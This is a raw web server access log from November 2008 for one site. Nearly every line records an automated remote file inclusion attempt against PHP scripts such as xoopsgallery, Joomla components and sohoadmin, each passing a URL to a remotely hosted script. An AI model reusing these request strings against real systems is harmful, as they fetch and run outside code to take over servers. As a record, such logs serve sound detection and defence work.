82.48.115.61 - - [10/Nov/2008:09:11:22 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:22 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:22 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:11:23 -0800] "GET /logs/access_080827.log/index1.php?inc=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:09:11:31 -0800] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:11:33 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:11:33 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:43 -0800] "GET /logs/access_080907.log//index_for.php?classified_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:44 -0800] "GET /logs/access_081007.log//index_for.php?classified_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:44 -0800] "GET /index_for.php?classified_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:11:44 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:44 -0800] "GET /logs//index_for.php?classified_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:46 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:11:48 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:11:48 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:11:48 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:50 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:50 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:11:50 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:52 -0800] "GET /logs/access_081007.log//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:52 -0800] "GET /logs//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:11:52 -0800] "GET /index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:11:57 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:12:00 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:09:12:00 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.108.180.81 - - [10/Nov/2008:09:12:04 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "dmulk.com"
38.108.180.81 - - [10/Nov/2008:09:12:04 -0800] "GET /blog/index.php/2008/10/ HTTP/1.1" 200 12585 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "dmulk.com"
74.52.8.138 - - [10/Nov/2008:09:12:10 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id6e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.8.138 - - [10/Nov/2008:09:12:10 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id6e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.8.138 - - [10/Nov/2008:09:12:10 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id6e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.8.138 - - [10/Nov/2008:09:12:12 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id6e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:12:19 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:12:28 -0800] "GET /logs/access_080529.log/display.php?page=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:12:29 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:12:29 -0800] "GET /errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:12:29 -0800] "GET /logs/errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:12:30 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:12:31 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:12:31 -0800] "GET /logs/access_080826.log//index_for.php?classified_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:12:31 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:12:32 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:12:36 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:12:37 -0800] "GET /logs/access_080826.log//index_for.php?classified_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:12:38 -0800] "GET /logs/access_080928.log//modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:12:38 -0800] "GET /modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:12:38 -0800] "GET /logs//modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:12:39 -0800] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:12:39 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:12:39 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:12:42 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:12:42 -0800] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:12:44 -0800] "GET /logs/access_080824.log/errors.php?error=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:12:45 -0800] "GET /logs/access_080607.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:09:12:49 -0800] "GET /logs/access_080708.log/display.php?page=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.214.193.212 - - [10/Nov/2008:09:12:51 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:12:57 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.wutangcorp.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:13:09 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:13:09 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:13:10 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:13:16 -0800] "GET /logs/access_080708.log%20/display.php?page=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.104 - - [10/Nov/2008:09:13:18 -0800] "GET /modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.wutangcorp.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.164.104 - - [10/Nov/2008:09:13:19 -0800] "GET /logs//modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.wutangcorp.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:13:19 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:13:27 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:28 -0800] "GET /logs/access_071111.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:28 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:29 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:13:31 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:37 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:13:38 -0800] "GET /logs/access_080831.log/index1.php?inc=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:13:38 -0800] "GET /index1.php?inc=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:13:38 -0800] "GET /logs/index1.php?inc=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:13:39 -0800] "GET /logs/access_080303.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:13:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:13:39 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:13:39 -0800] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:13:42 -0800] "GET /logs/access_080607.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:13:43 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:13:43 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:43 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:43 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:13:44 -0800] "GET /logs/access_071204.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:13:44 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:13:44 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:13:44 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.17.153 - - [10/Nov/2008:09:13:44 -0800] "GET /logs/access_080807.log HTTP/1.0" 200 2274800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:13:46 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:13:48 -0800] "GET /logs/access_080408.log/pages.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:13:49 -0800] "GET /pages.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:13:49 -0800] "GET /logs/pages.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:09:13:50 -0800] "GET /logs/access_080827.log/index1.php?inc=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:13:53 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:13:53 -0800] "GET /logs/access_071111.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:13:53 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:13:53 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:13:53 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.189.20.26 - - [10/Nov/2008:09:13:54 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:09:13:54 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:09:13:54 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:13:59 -0800] "GET /logs/access_080702.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:13:59 -0800] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:14:00 -0800] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:14:00 -0800] "GET /logs/access_080319.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:14:04 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:09:14:05 -0800] "GET /logs//errors.php?error=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
